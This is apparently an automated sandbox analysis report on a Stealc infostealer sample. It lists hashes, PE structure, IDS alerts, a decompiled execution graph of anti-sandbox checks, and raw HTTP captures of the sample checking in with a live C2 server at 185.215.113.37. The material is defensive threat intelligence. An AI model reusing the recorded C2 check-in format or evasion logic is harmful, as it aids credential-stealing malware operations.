                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94578014704454
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'865'216 bytes
                        MD5:f8499202b78a41093fc86e4ee8be2d0b
                        SHA1:56066a06e2ae405ad5e7dc5be7f37283aa742fa0
                        SHA256:e81eb5bcb9497a84f1f496cf0af37c234f8e80aaf0bb179e153005592ef67321
                        SHA512:3668d4267ba66bab0a93d60c773dda38eab7d3ec4751d869b87a1ccf4e7b88a0fabc7082d375f9190a1800f9467ca619bfbd87bf71d418e273b42882c79e07ed
                        SSDEEP:49152:JdN6M75rSnGcIoc3MNTgt69xS0NRVFkd:l19SnaoWt694GF
                        TLSH:68853390286BC9BDC08C84FDF3160CA53A789F1E89659B52D2AC133FA3296D1517F6D8
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xaaa000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FECB0898A3Ah
                        andps xmm3, dqword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007FECB089AA35h
                        add byte ptr [ebx], cl
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00h], ah
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x228006dc8a185ba5cbf85e03a56d0f5b18cf5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2a90000x20025dd88df222d466250ad73a1e20b0601unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        nxusumaz0x5070000x1a20000x1a1400e723b2e1510566ed818a2ec25da32ba9False0.9947304242810066data7.954159005583094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        hgxnhwve0x6a90000x10000x400bdbcd95e1dccd879da921042fe06c99cFalse0.7890625data6.144568537420407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6aa0000x30000x22008e38bfa82d80d09a1d368005423a6affFalse0.04377297794117647DOS executable (COM)0.5576186273692433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-24T20:20:04.670212+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 24, 2024 20:20:03.443120956 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:03.448626041 CEST8049704185.215.113.37192.168.2.5
                        Oct 24, 2024 20:20:03.448718071 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:03.448885918 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:03.454312086 CEST8049704185.215.113.37192.168.2.5
                        Oct 24, 2024 20:20:04.372705936 CEST8049704185.215.113.37192.168.2.5
                        Oct 24, 2024 20:20:04.372777939 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:04.376467943 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:04.383615017 CEST8049704185.215.113.37192.168.2.5
                        Oct 24, 2024 20:20:04.670043945 CEST8049704185.215.113.37192.168.2.5
                        Oct 24, 2024 20:20:04.670212030 CEST4970480192.168.2.5185.215.113.37
                        Oct 24, 2024 20:20:06.898168087 CEST4970480192.168.2.5185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704185.215.113.37804788C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 24, 2024 20:20:03.448885918 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 24, 2024 20:20:04.372705936 CEST203INHTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 18:20:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 24, 2024 20:20:04.376467943 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 42 37 38 43 33 45 34 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a
                        Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="hwid"D57B78C3E4104081907672------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="build"doma------BFHDHJKKJDHJJJJKEGHI--
                        Oct 24, 2024 20:20:04.670043945 CEST210INHTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 18:20:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:14:19:59
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x400000
                        File size:1'865'216 bytes
                        MD5 hash:F8499202B78A41093FC86E4EE8BE2D0B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:8.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
                          execution_graph 13509 4169f0 13554 402260 13509->13554 13533 416a64 13534 41a9b0 4 API calls 13533->13534 13535 416a6b 13534->13535 13536 41a9b0 4 API calls 13535->13536 13537 416a72 13536->13537 13538 41a9b0 4 API calls 13537->13538 13539 416a79 13538->13539 13540 41a9b0 4 API calls 13539->13540 13541 416a80 13540->13541 13706 41a8a0 13541->13706 13543 416b0c 13710 416920 GetSystemTime 13543->13710 13545 416a89 13545->13543 13547 416ac2 OpenEventA 13545->13547 13548 416af5 CloseHandle Sleep 13547->13548 13549 416ad9 13547->13549 13551 416b0a 13548->13551 13553 416ae1 CreateEventA 13549->13553 13551->13545 13553->13543 13907 4045c0 13554->13907 13556 402274 13557 4045c0 2 API calls 13556->13557 13558 40228d 13557->13558 13559 4045c0 2 API calls 13558->13559 13560 4022a6 13559->13560 13561 4045c0 2 API calls 13560->13561 13562 4022bf 13561->13562 13563 4045c0 2 API calls 13562->13563 13564 4022d8 13563->13564 13565 4045c0 2 API calls 13564->13565 13566 4022f1 13565->13566 13567 4045c0 2 API calls 13566->13567 13568 40230a 13567->13568 13569 4045c0 2 API calls 13568->13569 13570 402323 13569->13570 13571 4045c0 2 API calls 13570->13571 13572 40233c 13571->13572 13573 4045c0 2 API calls 13572->13573 13574 402355 13573->13574 13575 4045c0 2 API calls 13574->13575 13576 40236e 13575->13576 13577 4045c0 2 API calls 13576->13577 13578 402387 13577->13578 13579 4045c0 2 API calls 13578->13579 13580 4023a0 13579->13580 13581 4045c0 2 API calls 13580->13581 13582 4023b9 13581->13582 13583 4045c0 2 API calls 13582->13583 13584 4023d2 13583->13584 13585 4045c0 2 API calls 13584->13585 13586 4023eb 13585->13586 13587 4045c0 2 API calls 13586->13587 13588 402404 13587->13588 13589 4045c0 2 API calls 13588->13589 13590 40241d 13589->13590 13591 4045c0 2 API calls 13590->13591 13592 402436 13591->13592 13593 4045c0 2 API calls 13592->13593 13594 40244f 13593->13594 13595 4045c0 2 API calls 13594->13595 13596 402468 13595->13596 13597 4045c0 2 API calls 13596->13597 13598 402481 13597->13598 13599 4045c0 2 API calls 13598->13599 13600 40249a 13599->13600 13601 4045c0 2 API calls 13600->13601 13602 4024b3 13601->13602 13603 4045c0 2 API calls 13602->13603 13604 4024cc 13603->13604 13605 4045c0 2 API calls 13604->13605 13606 4024e5 13605->13606 13607 4045c0 2 API calls 13606->13607 13608 4024fe 13607->13608 13609 4045c0 2 API calls 13608->13609 13610 402517 13609->13610 13611 4045c0 2 API calls 13610->13611 13612 402530 13611->13612 13613 4045c0 2 API calls 13612->13613 13614 402549 13613->13614 13615 4045c0 2 API calls 13614->13615 13616 402562 13615->13616 13617 4045c0 2 API calls 13616->13617 13618 40257b 13617->13618 13619 4045c0 2 API calls 13618->13619 13620 402594 13619->13620 13621 4045c0 2 API calls 13620->13621 13622 4025ad 13621->13622 13623 4045c0 2 API calls 13622->13623 13624 4025c6 13623->13624 13625 4045c0 2 API calls 13624->13625 13626 4025df 13625->13626 13627 4045c0 2 API calls 13626->13627 13628 4025f8 13627->13628 13629 4045c0 2 API calls 13628->13629 13630 402611 13629->13630 13631 4045c0 2 API calls 13630->13631 13632 40262a 13631->13632 13633 4045c0 2 API calls 13632->13633 13634 402643 13633->13634 13635 4045c0 2 API calls 13634->13635 13636 40265c 13635->13636 13637 4045c0 2 API calls 13636->13637 13638 402675 13637->13638 13639 4045c0 2 API calls 13638->13639 13640 40268e 13639->13640 13641 419860 13640->13641 13912 419750 GetPEB 13641->13912 13643 419868 13644 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13643->13644 13645 41987a 13643->13645 13646 419af4 GetProcAddress 13644->13646 13647 419b0d 13644->13647 13650 41988c 21 API calls 13645->13650 13646->13647 13648 419b46 13647->13648 13649 419b16 GetProcAddress GetProcAddress 13647->13649 13651 419b68 13648->13651 13652 419b4f GetProcAddress 13648->13652 13649->13648 13650->13644 13653 419b71 GetProcAddress 13651->13653 13654 419b89 13651->13654 13652->13651 13653->13654 13655 416a00 13654->13655 13656 419b92 GetProcAddress GetProcAddress 13654->13656 13657 41a740 13655->13657 13656->13655 13658 41a750 13657->13658 13659 416a0d 13658->13659 13660 41a77e lstrcpy 13658->13660 13661 4011d0 13659->13661 13660->13659 13662 4011e8 13661->13662 13663 401217 13662->13663 13664 40120f ExitProcess 13662->13664 13665 401160 GetSystemInfo 13663->13665 13666 401184 13665->13666 13667 40117c ExitProcess 13665->13667 13668 401110 GetCurrentProcess VirtualAllocExNuma 13666->13668 13669 401141 ExitProcess 13668->13669 13670 401149 13668->13670 13913 4010a0 VirtualAlloc 13670->13913 13673 401220 13917 4189b0 13673->13917 13676 401249 __aulldiv 13677 40129a 13676->13677 13678 401292 ExitProcess 13676->13678 13679 416770 GetUserDefaultLangID 13677->13679 13680 4167d3 13679->13680 13681 416792 13679->13681 13687 401190 13680->13687 13681->13680 13682 4167c1 ExitProcess 13681->13682 13683 4167a3 ExitProcess 13681->13683 13684 4167b7 ExitProcess 13681->13684 13685 4167cb ExitProcess 13681->13685 13686 4167ad ExitProcess 13681->13686 13688 4178e0 3 API calls 13687->13688 13689 40119e 13688->13689 13690 4011cc 13689->13690 13691 417850 3 API calls 13689->13691 13694 417850 GetProcessHeap RtlAllocateHeap GetUserNameA 13690->13694 13692 4011b7 13691->13692 13692->13690 13693 4011c4 ExitProcess 13692->13693 13695 416a30 13694->13695 13696 4178e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13695->13696 13697 416a43 13696->13697 13698 41a9b0 13697->13698 13919 41a710 13698->13919 13700 41a9c1 lstrlen 13703 41a9e0 13700->13703 13701 41aa18 13920 41a7a0 13701->13920 13703->13701 13705 41a9fa lstrcpy lstrcat 13703->13705 13704 41aa24 13704->13533 13705->13701 13707 41a8bb 13706->13707 13708 41a90b 13707->13708 13709 41a8f9 lstrcpy 13707->13709 13708->13545 13709->13708 13924 416820 13710->13924 13712 41698e 13713 416998 sscanf 13712->13713 13953 41a800 13713->13953 13715 4169aa SystemTimeToFileTime SystemTimeToFileTime 13716 4169e0 13715->13716 13717 4169ce 13715->13717 13719 415b10 13716->13719 13717->13716 13718 4169d8 ExitProcess 13717->13718 13720 415b1d 13719->13720 13721 41a740 lstrcpy 13720->13721 13722 415b2e 13721->13722 13955 41a820 lstrlen 13722->13955 13725 41a820 2 API calls 13726 415b64 13725->13726 13727 41a820 2 API calls 13726->13727 13728 415b74 13727->13728 13959 416430 13728->13959 13731 41a820 2 API calls 13732 415b93 13731->13732 13733 41a820 2 API calls 13732->13733 13734 415ba0 13733->13734 13735 41a820 2 API calls 13734->13735 13736 415bad 13735->13736 13737 41a820 2 API calls 13736->13737 13738 415bf9 13737->13738 13968 4026a0 13738->13968 13746 415cc3 13747 416430 lstrcpy 13746->13747 13748 415cd5 13747->13748 13749 41a7a0 lstrcpy 13748->13749 13750 415cf2 13749->13750 13751 41a9b0 4 API calls 13750->13751 13752 415d0a 13751->13752 13753 41a8a0 lstrcpy 13752->13753 13754 415d16 13753->13754 13755 41a9b0 4 API calls 13754->13755 13756 415d3a 13755->13756 13757 41a8a0 lstrcpy 13756->13757 13758 415d46 13757->13758 13759 41a9b0 4 API calls 13758->13759 13760 415d6a 13759->13760 13761 41a8a0 lstrcpy 13760->13761 13762 415d76 13761->13762 13763 41a740 lstrcpy 13762->13763 13764 415d9e 13763->13764 14694 417500 GetWindowsDirectoryA 13764->14694 13767 41a7a0 lstrcpy 13768 415db8 13767->13768 14704 404880 13768->14704 13770 415dbe 14849 4117a0 13770->14849 13772 415dc6 13773 41a740 lstrcpy 13772->13773 13774 415de9 13773->13774 13775 401590 lstrcpy 13774->13775 13776 415dfd 13775->13776 14865 405960 13776->14865 13778 415e03 15009 411050 13778->15009 13780 415e0e 13781 41a740 lstrcpy 13780->13781 13782 415e32 13781->13782 13783 401590 lstrcpy 13782->13783 13784 415e46 13783->13784 13785 405960 34 API calls 13784->13785 13786 415e4c 13785->13786 15013 410d90 13786->15013 13788 415e57 13789 41a740 lstrcpy 13788->13789 13790 415e79 13789->13790 13791 401590 lstrcpy 13790->13791 13792 415e8d 13791->13792 13793 405960 34 API calls 13792->13793 13794 415e93 13793->13794 15020 410f40 13794->15020 13796 415e9e 13797 401590 lstrcpy 13796->13797 13798 415eb5 13797->13798 15025 411a10 13798->15025 13800 415eba 13801 41a740 lstrcpy 13800->13801 13802 415ed6 13801->13802 15369 404fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13802->15369 13804 415edb 13805 401590 lstrcpy 13804->13805 13806 415f5b 13805->13806 15376 410740 13806->15376 13808 415f60 13809 41a740 lstrcpy 13808->13809 13810 415f86 13809->13810 13811 401590 lstrcpy 13810->13811 13812 415f9a 13811->13812 13813 405960 34 API calls 13812->13813 13814 415fa0 13813->13814 13908 4045d1 RtlAllocateHeap 13907->13908 13910 404621 VirtualProtect 13908->13910 13910->13556 13912->13643 13915 4010c2 codecvt 13913->13915 13914 4010fd 13914->13673 13915->13914 13916 4010e2 VirtualFree 13915->13916 13916->13914 13918 401233 GlobalMemoryStatusEx 13917->13918 13918->13676 13919->13700 13921 41a7c2 13920->13921 13922 41a7ec 13921->13922 13923 41a7da lstrcpy 13921->13923 13922->13704 13923->13922 13925 41a740 lstrcpy 13924->13925 13926 416833 13925->13926 13927 41a9b0 4 API calls 13926->13927 13928 416845 13927->13928 13929 41a8a0 lstrcpy 13928->13929 13930 41684e 13929->13930 13931 41a9b0 4 API calls 13930->13931 13932 416867 13931->13932 13933 41a8a0 lstrcpy 13932->13933 13934 416870 13933->13934 13935 41a9b0 4 API calls 13934->13935 13936 41688a 13935->13936 13937 41a8a0 lstrcpy 13936->13937 13938 416893 13937->13938 13939 41a9b0 4 API calls 13938->13939 13940 4168ac 13939->13940 13941 41a8a0 lstrcpy 13940->13941 13942 4168b5 13941->13942 13943 41a9b0 4 API calls 13942->13943 13944 4168cf 13943->13944 13945 41a8a0 lstrcpy 13944->13945 13946 4168d8 13945->13946 13947 41a9b0 4 API calls 13946->13947 13948 4168f3 13947->13948 13949 41a8a0 lstrcpy 13948->13949 13950 4168fc 13949->13950 13951 41a7a0 lstrcpy 13950->13951 13952 416910 13951->13952 13952->13712 13954 41a812 13953->13954 13954->13715 13956 41a83f 13955->13956 13957 415b54 13956->13957 13958 41a87b lstrcpy 13956->13958 13957->13725 13958->13957 13960 41a8a0 lstrcpy 13959->13960 13961 416443 13960->13961 13962 41a8a0 lstrcpy 13961->13962 13963 416455 13962->13963 13964 41a8a0 lstrcpy 13963->13964 13965 416467 13964->13965 13966 41a8a0 lstrcpy 13965->13966 13967 415b86 13966->13967 13967->13731 13969 4045c0 2 API calls 13968->13969 13970 4026b4 13969->13970 13971 4045c0 2 API calls 13970->13971 13972 4026d7 13971->13972 13973 4045c0 2 API calls 13972->13973 13974 4026f0 13973->13974 13975 4045c0 2 API calls 13974->13975 13976 402709 13975->13976 13977 4045c0 2 API calls 13976->13977 13978 402736 13977->13978 13979 4045c0 2 API calls 13978->13979 13980 40274f 13979->13980 13981 4045c0 2 API calls 13980->13981 13982 402768 13981->13982 13983 4045c0 2 API calls 13982->13983 13984 402795 13983->13984 13985 4045c0 2 API calls 13984->13985 13986 4027ae 13985->13986 13987 4045c0 2 API calls 13986->13987 13988 4027c7 13987->13988 13989 4045c0 2 API calls 13988->13989 13990 4027e0 13989->13990 13991 4045c0 2 API calls 13990->13991 13992 4027f9 13991->13992 13993 4045c0 2 API calls 13992->13993 13994 402812 13993->13994 13995 4045c0 2 API calls 13994->13995 13996 40282b 13995->13996 13997 4045c0 2 API calls 13996->13997 13998 402844 13997->13998 13999 4045c0 2 API calls 13998->13999 14000 40285d 13999->14000 14001 4045c0 2 API calls 14000->14001 14002 402876 14001->14002 14003 4045c0 2 API calls 14002->14003 14004 40288f 14003->14004 14005 4045c0 2 API calls 14004->14005 14006 4028a8 14005->14006 14007 4045c0 2 API calls 14006->14007 14008 4028c1 14007->14008 14009 4045c0 2 API calls 14008->14009 14010 4028da 14009->14010 14011 4045c0 2 API calls 14010->14011 14012 4028f3 14011->14012 14013 4045c0 2 API calls 14012->14013 14014 40290c 14013->14014 14015 4045c0 2 API calls 14014->14015 14016 402925 14015->14016 14017 4045c0 2 API calls 14016->14017 14018 40293e 14017->14018 14019 4045c0 2 API calls 14018->14019 14020 402957 14019->14020 14021 4045c0 2 API calls 14020->14021 14022 402970 14021->14022 14023 4045c0 2 API calls 14022->14023 14024 402989 14023->14024 14025 4045c0 2 API calls 14024->14025 14026 4029a2 14025->14026 14027 4045c0 2 API calls 14026->14027 14028 4029bb 14027->14028 14029 4045c0 2 API calls 14028->14029 14030 4029d4 14029->14030 14031 4045c0 2 API calls 14030->14031 14032 4029ed 14031->14032 14033 4045c0 2 API calls 14032->14033 14034 402a06 14033->14034 14035 4045c0 2 API calls 14034->14035 14036 402a1f 14035->14036 14037 4045c0 2 API calls 14036->14037 14038 402a38 14037->14038 14039 4045c0 2 API calls 14038->14039 14040 402a51 14039->14040 14041 4045c0 2 API calls 14040->14041 14042 402a6a 14041->14042 14043 4045c0 2 API calls 14042->14043 14044 402a83 14043->14044 14045 4045c0 2 API calls 14044->14045 14046 402a9c 14045->14046 14047 4045c0 2 API calls 14046->14047 14048 402ab5 14047->14048 14049 4045c0 2 API calls 14048->14049 14050 402ace 14049->14050 14051 4045c0 2 API calls 14050->14051 14052 402ae7 14051->14052 14053 4045c0 2 API calls 14052->14053 14054 402b00 14053->14054 14055 4045c0 2 API calls 14054->14055 14056 402b19 14055->14056 14057 4045c0 2 API calls 14056->14057 14058 402b32 14057->14058 14059 4045c0 2 API calls 14058->14059 14060 402b4b 14059->14060 14061 4045c0 2 API calls 14060->14061 14062 402b64 14061->14062 14063 4045c0 2 API calls 14062->14063 14064 402b7d 14063->14064 14065 4045c0 2 API calls 14064->14065 14066 402b96 14065->14066 14067 4045c0 2 API calls 14066->14067 14068 402baf 14067->14068 14069 4045c0 2 API calls 14068->14069 14070 402bc8 14069->14070 14071 4045c0 2 API calls 14070->14071 14072 402be1 14071->14072 14073 4045c0 2 API calls 14072->14073 14074 402bfa 14073->14074 14075 4045c0 2 API calls 14074->14075 14076 402c13 14075->14076 14077 4045c0 2 API calls 14076->14077 14078 402c2c 14077->14078 14079 4045c0 2 API calls 14078->14079 14080 402c45 14079->14080 14081 4045c0 2 API calls 14080->14081 14082 402c5e 14081->14082 14083 4045c0 2 API calls 14082->14083 14084 402c77 14083->14084 14085 4045c0 2 API calls 14084->14085 14086 402c90 14085->14086 14087 4045c0 2 API calls 14086->14087 14088 402ca9 14087->14088 14089 4045c0 2 API calls 14088->14089 14090 402cc2 14089->14090 14091 4045c0 2 API calls 14090->14091 14092 402cdb 14091->14092 14093 4045c0 2 API calls 14092->14093 14094 402cf4 14093->14094 14095 4045c0 2 API calls 14094->14095 14096 402d0d 14095->14096 14097 4045c0 2 API calls 14096->14097 14098 402d26 14097->14098 14099 4045c0 2 API calls 14098->14099 14100 402d3f 14099->14100 14101 4045c0 2 API calls 14100->14101 14102 402d58 14101->14102 14103 4045c0 2 API calls 14102->14103 14104 402d71 14103->14104 14105 4045c0 2 API calls 14104->14105 14106 402d8a 14105->14106 14107 4045c0 2 API calls 14106->14107 14108 402da3 14107->14108 14109 4045c0 2 API calls 14108->14109 14110 402dbc 14109->14110 14111 4045c0 2 API calls 14110->14111 14112 402dd5 14111->14112 14113 4045c0 2 API calls 14112->14113 14114 402dee 14113->14114 14115 4045c0 2 API calls 14114->14115 14116 402e07 14115->14116 14117 4045c0 2 API calls 14116->14117 14118 402e20 14117->14118 14119 4045c0 2 API calls 14118->14119 14120 402e39 14119->14120 14121 4045c0 2 API calls 14120->14121 14122 402e52 14121->14122 14123 4045c0 2 API calls 14122->14123 14124 402e6b 14123->14124 14125 4045c0 2 API calls 14124->14125 14126 402e84 14125->14126 14127 4045c0 2 API calls 14126->14127 14128 402e9d 14127->14128 14129 4045c0 2 API calls 14128->14129 14130 402eb6 14129->14130 14131 4045c0 2 API calls 14130->14131 14132 402ecf 14131->14132 14133 4045c0 2 API calls 14132->14133 14134 402ee8 14133->14134 14135 4045c0 2 API calls 14134->14135 14136 402f01 14135->14136 14137 4045c0 2 API calls 14136->14137 14138 402f1a 14137->14138 14139 4045c0 2 API calls 14138->14139 14140 402f33 14139->14140 14141 4045c0 2 API calls 14140->14141 14142 402f4c 14141->14142 14143 4045c0 2 API calls 14142->14143 14144 402f65 14143->14144 14145 4045c0 2 API calls 14144->14145 14146 402f7e 14145->14146 14147 4045c0 2 API calls 14146->14147 14148 402f97 14147->14148 14149 4045c0 2 API calls 14148->14149 14150 402fb0 14149->14150 14151 4045c0 